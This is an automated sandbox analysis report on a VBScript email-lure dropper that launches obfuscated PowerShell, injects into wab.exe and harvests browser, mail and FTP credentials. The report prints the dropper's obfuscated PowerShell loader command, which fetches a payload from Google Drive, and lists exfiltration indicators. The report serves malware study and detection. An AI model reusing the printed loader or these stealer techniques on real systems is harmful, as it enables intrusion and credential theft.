            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98266Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98156Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 98047Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97938Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97813Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97688Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97579Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97454Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 97328Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1200000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199871Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 1199765Jump to behavior
            Source: wab.exe, 0000000B.00000002.3610795156.000000000646E000.00000004.00000020.00020000.00000000.sdmp, wab.exe, 0000000B.00000002.3610795156.0000000006418000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW
            Source: powershell.exe, 00000002.00000002.2857899695.0000015938F13000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess queried: DebugPortJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: page read and write | page guardJump to behavior

            HIPS / PFW / Operating System Protection Evasion

            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 3C60000Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMemory written: C:\Program Files (x86)\Windows Mail\wab.exe base: 27CFB24Jump to behavior
            Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndighedens15 -lt $Hvornaar; $Rekursmyndighedens15+=(6)){$Palatoglossal+=$Sklmsstykkets.$Skydevinduer172.Invoke($Rekursmyndighedens15, $Forsyningssikkerhed);}$Palatoglossal;}function Multikunsts($Gennemskylning){. ($diffusionism) ($Gennemskylning);}$Hydrorhiza=Phenolsulphonate ' KonnMrei toStudiz Chari PlanlStryclun,idaSlger/ elvs5Bowdl.Bes f0Srgem Afski(forduWKa itiFribonBogstdMopokoDriftwetagesBlodr AfpolNForbrTSmaav Albue1Formi0M.lia.An,va0Canyo; Jern sa meW,ilviistedenPoula6Alcdi4Aksel;Jum o AftrrxBesmr6Tidsf4 ,ell;Spect Opercr ,ortv ycon:Tomba1Salva2De.im1 erv.Absi.0Spgel)Tinte KugleGdrawleInte.c,ilmukSt ntoArmsl/ Otte2 T.ng0Resub1Grand0Del e0Misp 1Plows0Je,ns1Feath NgenFUnderiFarthrthroweCo,taf PogooChookxtalje/Haveb1Ret.r2luxur1O.set.Mng e0Exe,u ';$Digteriske=Phenolsulphonate 'Udkl,U StocsBonnbeLystyr nif-.icliAPrevagko oneAttranTranctChon ';$Unbaptise=Phenolsulphonate 'Ga,brhWobbltMilietSpatipUnds sUprob: Cock/Maal./Forh dRetskrTa.rii lucovFrarae Parf. 
ForbgJolleoCrazio BygggFalsklRecepeFyrvr.Arm,rcWalllo Afkrm Zigg/Byud.u EftecBesgs?je.neeVandsxUnrecpSkdero,iblir Gu,ttsuccu=U gendTilp o Reliw HenknSkraalBromoo ,eora.ockedArelh&InderiGrisgd T.nn= Stif1 ,ignr irlo6 Bela8fo,pe8be,anrFo.siMYaretFDenot1A,sgeEMormyK Til.KSt.alwSeriatHackb1Wagge9I.fuskNut,iWTyv gaDrgliHJurymj K,stjLamp,LKultuQTomastspyttO iteMRenliQS,hinJ.itsthesop,-,oboteClass6Klike ';$Polemiseres=Phenolsulphonate 'Owlis>G und ';$diffusionism=Phenolsulphonate ' ideoiSjakke Tru,x,arer ';$Offtype='Danernes';Multikunsts (Phenolsulphonate 'AnthrSBooteeHomeltRe ov-Do,anCSei noSigaunKonklt Gce.eNaturnSchretom.or Flkke- IndtP O reaS.lemtElmeth Comm PyritTLempe:.oksa\AftalHA.pomaSupern FyradPlanlwEx ger nguliGlamot Faste vale. cac tSago x .emitFrihe Ekstr-DisciVKitcha siel .loduTilste P im Dish$Beac.OOrth,f Platfte,antDioceyOrbitpDeranePseud;d.cim ');Multikunsts (Phenolsulphonate 'AnfgtiSu,pffVascu jlk(reo.ttEjdameMuldzsKatakt Parc- DdempMaamca.remktGas rhMoist Sel T.alae:Lset \Ski pHIsochaMyodenItalid Tituw rsmar ,rooi M crt Uregeferro.ManattGeledxSalontC eap) .ono{Softwetre,ix Accei PlantUnsha}Ollco;Spri. ');$Overreach161 = Phenolsulphonate 'KogekeStockcRedubhOverco erri rh,ce%zo.elaTch,tpDusinphove.d cyclaCoendtNonr.aFly.e%Antit\WaughAImmormPhre.aDistur .oncaKristnF llbtBevikfCultiaKlav,r SamevUaktueGaskar TrlbsPreac.,dfrlBSundriMarkep Milj Overw&Kastr&Reall Sl.deJu,elcInimihRetrao.nade Pfa.z$.ocho ';Multikunsts (Phenolsulphonate ' ngdo$ DezigPlacelspr nosuburbroupea Tabel tech:Shallf PansuUdt.nn dataksk,frtWilyciOnsweo.ebegnTeabos AutotP vepe SatigFrostnErgotiBr,epnSysteg P,ore Lin.nP stbsH,ldo=Slosh(Tl.enc,arsampaneldCad c shel/JapaccNaitl Gla.s$Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" (same obfuscated command line as in the wscript.exe process-creation entry above)
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Amarantfarvers.Bip && echo $"Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.ServiceProcess\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.ServiceProcess.dll VolumeInformationJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Program Files (x86)\Windows Mail\wab.exe VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
            Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

            Stealing of Sensitive Information

            Source: Yara match File source: 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: wab.exe PID: 5808, type: MEMORYSTR
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Cookies
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\2o7hffxt.default-release\cookies.sqlite
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\FTP Navigator\Ftplist.txt
            Source: C:\Program Files (x86)\Windows Mail\wab.exe File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles
            Source: C:\Program Files (x86)\Windows Mail\wab.exe Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
            Source: Yara match File source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: wab.exe PID: 5808, type: MEMORYSTR

            Remote Access Functionality

            Source: Yara match File source: 0000000B.00000002.3626677690.0000000021FB4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.3626677690.0000000021F81000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: 0000000B.00000002.3626677690.0000000021FAC000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
            Source: Yara match File source: Process Memory Space: wab.exe PID: 5808, type: MEMORYSTR
            Reconnaissance | Resource Development | Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Command and Control | Exfiltration | Impact
            Gather Victim Identity Information221
            Scripting
            Valid Accounts121
            Windows Management Instrumentation
            221
            Scripting
            1
            DLL Side-Loading
            1
            Disable or Modify Tools
            2
            OS Credential Dumping
            1
            File and Directory Discovery
            Remote Services1
            Archive Collected Data
            1
            Ingress Tool Transfer
            Exfiltration Over Other Network MediumAbuse Accessibility Features
            CredentialsDomainsDefault Accounts1
            Exploitation for Client Execution
            1
            DLL Side-Loading
            111
            Process Injection
            2
            Obfuscated Files or Information
            11
            Input Capture
            24
            System Information Discovery
            Remote Desktop Protocol2
            Data from Local System
            21
            Encrypted Channel
            Exfiltration Over BluetoothNetwork Denial of Service
            Email AddressesDNS ServerDomain Accounts11
            Command and Scripting Interpreter
            Logon Script (Windows)Logon Script (Windows)1
            Software Packing
            1
            Credentials in Registry
            1
            Query Registry
            SMB/Windows Admin Shares1
            Email Collection
            1
            Non-Standard Port
            Automated ExfiltrationData Encrypted for Impact
            Employee NamesVirtual Private ServerLocal Accounts2
            PowerShell
            Login HookLogin Hook1
            DLL Side-Loading
            NTDS121
            Security Software Discovery
            Distributed Component Object Model11
            Input Capture
            2
            Non-Application Layer Protocol
            Traffic DuplicationData Destruction
            Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
            Masquerading
            LSA Secrets1
            Process Discovery
            SSH1
            Clipboard Data
            23
            Application Layer Protocol
            Scheduled TransferData Encrypted for Impact
            Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts151
            Virtualization/Sandbox Evasion
            Cached Domain Credentials151
            Virtualization/Sandbox Evasion
            VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
            DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items111
            Process Injection
            DCSync1
            Application Window Discovery
            Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
            Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc Filesystem1
            System Network Configuration Discovery
            Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
            [Behavior graph: ID 1430117, Sample: Swift_Message#1234323456.vbs, Startdate: 23/04/2024, Architecture: WINDOWS, Score: 100. Process chain: wscript.exe -> powershell.exe -> powershell.exe -> wab.exe]

            Source | Detection | Scanner | Label | Link
            Swift_Message#1234323456.vbs | 5% | ReversingLabs | Win32.Dropper.Generic |
            No Antivirus matches
            No Antivirus matches
            No Antivirus matches
            Source | Detection | Scanner | Label | Link
            http://crt.sectigo.com/SectigoRSADomainValidationSecureServerCA.crt0# | 0% | URL Reputation | safe |
            https://sectigo.com/CPS0 | 0% | URL Reputation | safe |
            http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
            http://ocsp.sectigo.com0 | 0% | URL Reputation | safe |
            http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
            http://pesterbdd.com/images/Pester.png | 100% | URL Reputation | malware |
            https://go.micro | 0% | URL Reputation | safe |
            https://contoso.com/License | 0% | URL Reputation | safe |
            https://contoso.com/Icon | 0% | URL Reputation | safe |
            https://contoso.com/ | 0% | URL Reputation | safe |
            Name | IP | Active | Malicious | Antivirus Detection | Reputation
            drive.google.com | 142.250.65.174 | true | false | | high
            drive.usercontent.google.com | 142.251.35.161 | true | false | | high
            api.ipify.org | 172.67.74.152 | true | false | | high
            smtp.privateemail.com | 66.29.159.53 | true | false | | high

            Name | Malicious | Antivirus Detection | Reputation
            https://api.ipify.org/ | false | | high
                                                              IP | Domain | Country | Flag | ASN | ASN Name | Malicious
                                                              142.251.35.161 | drive.usercontent.google.com | United States | | 15169 | GOOGLEUS | false
                                                              142.250.65.174 | drive.google.com | United States | | 15169 | GOOGLEUS | false
                                                              66.29.159.53 | smtp.privateemail.com | United States | | 19538 | ADVANTAGECOMUS | false
                                                              172.67.74.152 | api.ipify.org | United States | | 13335 | CLOUDFLARENETUS | false
                                                              Joe Sandbox version:40.0.0 Tourmaline
                                                              Analysis ID:1430117
                                                              Start date and time:2024-04-23 07:52:12 +02:00
                                                              Joe Sandbox product:CloudBasic
                                                              Overall analysis duration:0h 8m 11s
                                                              Hypervisor based Inspection enabled:false
                                                              Report type:full
                                                              Cookbook file name:default.jbs
                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                              Number of analysed new started processes analysed:12
                                                              Number of new started drivers analysed:0
                                                              Number of existing processes analysed:0
                                                              Number of existing drivers analysed:0
                                                              Number of injected processes analysed:0
                                                              Technologies:
                                                              • HCA enabled
                                                              • EGA enabled
                                                              • AMSI enabled
                                                              Analysis Mode:default
                                                              Analysis stop reason:Timeout
                                                              Sample name:Swift_Message#1234323456.vbs
                                                              Detection:MAL
                                                              Classification:mal100.troj.spyw.expl.evad.winVBS@12/7@4/4
                                                              EGA Information:
                                                              • Successful, ratio: 33.3%
                                                              HCA Information:
                                                              • Successful, ratio: 95%
                                                              • Number of executed functions: 118
                                                              • Number of non-executed functions: 4
                                                              Cookbook Comments:
                                                              • Found application associated with file extension: .vbs
                                                              • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                              • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                              • Execution Graph export aborted for target powershell.exe, PID 3428 because it is empty
                                                              • Execution Graph export aborted for target powershell.exe, PID 416 because it is empty
                                                              • HTTPS proxy raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                              • Not all processes where analyzed, report is missing behavior information
                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                              • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                              Time | Type | Description
                                                              07:53:26 | API Interceptor | 397x Sleep call for process: powershell.exe modified
                                                              07:54:06 | API Interceptor | 252940x Sleep call for process: wab.exe modified
                                                              Match | Associated Sample Name / URL | Detection | Threat Name | Context
                                                              66.29.159.53 | e-dekont_swift-details.vbs | malicious | AgentTesla, GuLoader |
                                                              | 17129052285907bbffa1e06db9a2c2be9b124dbfe370dcce33488c29504b5286529b8a6aa8471.dat-decoded.exe | malicious | AgentTesla |
                                                              | Scan_IMG-Payment Sheet _Till Febuary 2024...bat.exe | malicious | AgentTesla |
                                                              | 1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exe | malicious | AgentTesla |
                                                              | 1709572324a197889913f96ec9bd444cdc1a03ae72cd8e81098994f82b76ebbbd558d62ba0270.dat-decoded.exe | malicious | AgentTesla |
                                                              | https://www.wikiran.org/attachments/leaks/asbgroup//4d90f5a202dda02e5900334984637a7fd0d3b2e2/CIMB%20PAYMENT%200520.zip | malicious | AgentTesla |
                                                              | pAYMENTcOPY.com.exe | malicious | AgentTesla, NSISDropper |
                                                              | img.exe | malicious | AgentTesla |
                                                              | ORDER_4490_0003469.exe | malicious | AgentTesla |
                                                              | 584961.exe | malicious | AgentTesla |
                                                              172.67.74.152 | Sonic-Glyder.exe | malicious | Stealit | api.ipify.org/?format=json
                                                              | Sky-Beta.exe | malicious | Unknown | api.ipify.org/?format=json
                                                              | Sky-Beta.exe | malicious | Unknown | api.ipify.org/?format=json
                                                              | Sky-Beta-Setup.exe | malicious | Stealit | api.ipify.org/?format=json
                                                              | Sky-Beta.exe | malicious | Stealit | api.ipify.org/?format=json
                                                              | SongOfVikings.exe | malicious | Unknown | api.ipify.org/?format=json
                                                              | SongOfVikings.exe | malicious | Unknown | api.ipify.org/?format=json
                                                              | Sky-Beta Setup 1.0.0.exe | malicious | Unknown | api.ipify.org/?format=json
                                                                                  No context
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:modified
                                                                                  Size (bytes):11608
                                                                                  Entropy (8bit):4.886255615007755
                                                                                  Encrypted:false
                                                                                  SSDEEP:192:Pxoe5lpOdxoe56ib49Vsm5emdiVFn3eGOVpN6K3bkkjo5agkjDt4iWN3yBGHB9sT:lVib49+VoGIpN6KQkj2xkjh4iUx4cYK6
                                                                                  MD5:C7F7A26360E678A83AFAB85054B538EA
                                                                                  SHA1:B9C885922370EE7573E7C8CF0DDB8D97B7F6F022
                                                                                  SHA-256:C3D527BCA7A1D1A398F5BE0C70237BD69281601DFD7D1ED6D389B2FD8E3BC713
                                                                                  SHA-512:9F2F9DA5F4BF202A08BADCD4EF9CE159269EF47B657C6F67DC3C9FDB4EE0005CE5D0A9B4218DB383BAD53222B728B77B591CB5F41781AB30EF145CC7DB7D4F77
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:PSMODULECACHE......e..z..S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.............z..C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:data
                                                                                  Category:dropped
                                                                                  Size (bytes):64
                                                                                  Entropy (8bit):1.1940658735648508
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Nlllulbnolz:NllUc
                                                                                  MD5:F23953D4A58E404FCB67ADD0C45EB27A
                                                                                  SHA1:2D75B5CACF2916C66E440F19F6B3B21DFD289340
                                                                                  SHA-256:16F994BFB26D529E4C28ED21C6EE36D4AFEAE01CEEB1601E85E0E7FDFF4EFA8B
                                                                                  SHA-512:B90BFEC26910A590A367E8356A20F32A65DB41C6C62D79CA0DDCC8D95C14EB48138DEC6B992A6E5C7B35CFF643063012462DA3E747B2AA15721FE2ECCE02C044
                                                                                  Malicious:false
                                                                                  Reputation:moderate, very likely benign file
                                                                                  Preview:@...e................................................@..........
                                                                                  Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):60
                                                                                  Entropy (8bit):4.038920595031593
                                                                                  Encrypted:false
                                                                                  SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                  MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                  SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                  SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                  SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                  Malicious:false
                                                                                  Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                  Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):429220
                                                                                  Entropy (8bit):5.9655653892781615
                                                                                  Encrypted:false
                                                                                  SSDEEP:12288:KDFYZUYn/lTIRoRRVza6kh/ny7lcVUCFkOR:KO9/6WfQh+KGCFkOR
                                                                                  MD5:3302B774280DD0F1A5FF84F05FCD4D6D
                                                                                  SHA1:E46A4DE3DDA0F4B59B0D67BAE8B97594140C7B90
                                                                                  SHA-256:3BEAD7F96E50A3703ADCEB91E9F1E2EF58E71FAEAB66E23B32A30379D9D7D05E
                                                                                  SHA-512:AD9ADB6485AE1EB629255AC76FA7BDBE94DDFA7DDDA3EAEA62D882282ED046673245DF2E9F397F3AB3DB5DAB8A957B651F96867E12E87439F8C5A421246A74FB
                                                                                  Malicious:false
                                                                                  File type:ASCII text, with very long lines (355), with CRLF line terminators
                                                                                  Entropy (8bit):5.3410206762773385
                                                                                  TrID:
                                                                                  • Visual Basic Script (13500/0) 100.00%
                                                                                  File name:Swift_Message#1234323456.vbs
                                                                                  File size:8'731 bytes
                                                                                  MD5:78a3e500aa75424e4494cc24d8d2b1f3
                                                                                  SHA1:99b288b4dc02152cedcedd4f40752d55696f8eb1
                                                                                  SHA256:24220410bffece94d6ad483d61e540ee6b0fcc2d9be690d3b03d4b2b37ba07cb
                                                                                  SHA512:e23f3d60b1e12665363c75682244c6d30d23695ae838bdff138c840ee376e52f5aff168b29f88d645f17c2eb601c4fe485d0f1222f68b56891f98d5c41c5bf28
                                                                                  SSDEEP:192:s1dltIbgm2ZXmtIjR0RvYxI+MSA/T5deSIMU6O:ulKbgm2WIjRsYK+gbNIIO
                                                                                  TLSH:3C023C09456934DD110D0FB6D8EEB5AA0E4488A7D014D5EB754A134B70F63E8D39EBBC
                                                                                  File Content Preview:.. ..Function Wavinesses ......De4 = De4 & "$Forsyningssikkerhed = 1;$Skydevinduer172='Substrin';$Skydevinduer172+='g';Function Phenolsulphonate($Sklmsstykkets){$Hvornaar=$Sklmsstykkets.Length-$Forsyningssikkerhed;For($Rekursmyndighedens15=5; $Rekursmyndi
                                                                                  Icon Hash:68d69b8f86ab9a86
Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                                  Apr 23, 2024 07:53:29.511754036 CEST49716443192.168.2.6142.251.35.161
                                                                                  Apr 23, 2024 07:53:29.511771917 CEST44349716142.251.35.161192.168.2.6
